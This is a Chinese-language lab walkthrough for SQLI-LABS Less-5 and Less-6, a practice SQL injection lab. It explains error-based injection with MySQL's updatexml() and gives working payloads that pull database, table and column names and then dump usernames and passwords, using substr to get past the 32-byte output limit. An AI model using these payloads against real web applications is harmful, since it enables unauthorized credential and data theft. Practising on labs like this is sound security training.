SQLI-LABS Less-5 Less-6

Less-5 Less-6 是报错注入

不能使用 union()函数，或者没有回显位

报错注入常用函数：

（这里只用到了updatexml）

• updatexml(xml_doument,XPath_string,new_value)：

第一个参数：XML的内容

第二个参数：是需要update的位置XPATH路径

第三个参数：是替换后的内容

所以第一和第三个参数可以随便写，只需要利用第二个参数，他会校验你输入的内容是否符合XPATH格式函数利用和语法明白了，如果找不到相应的xpath路径，updatexml函数就会报出错误concat()函数，由updatexml()函数xpath路径需要连接特殊字符，被连接的特殊字符需要进行16进制编码，最多输出32个字节

• floor()
• extractvalue()
• exp()

Less-5

闭合字符：'$id'

?id=1' union select 1,2,3 --+
#没有回显，利用报错注入

爆库名：

​
?id=1' and updatexml(1,concat(0x7e,(select database())),1) --+

理解了报错注入的方式，接下来就轻松了：

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")),1) --+
#爆表名 emails,referers,uagents,users

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")),1) --+
#爆字段名 username,password

?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,'@',password) from security.users)),1) --+
#爆数据

发现最后的数据不全，这是因为 updatexml函数 最多输出32个字节，所以我们需要利用 substr函数

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31)),1) --+ 
#爆数据，掌握substr函数，依此类推

Less-6

跟 Less-5 一样的注入手法

闭合字符："$id"

?id=1" and updatexml(1,concat(0x7e,(select database())),1) --+
#爆数据库 security

?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")),1) --+
#爆表名 emails,referers,uagents,users

?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")),1) --+
#爆字段名 username,password

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31)),1) --+ 
#爆数据，掌握substr函数，依此类推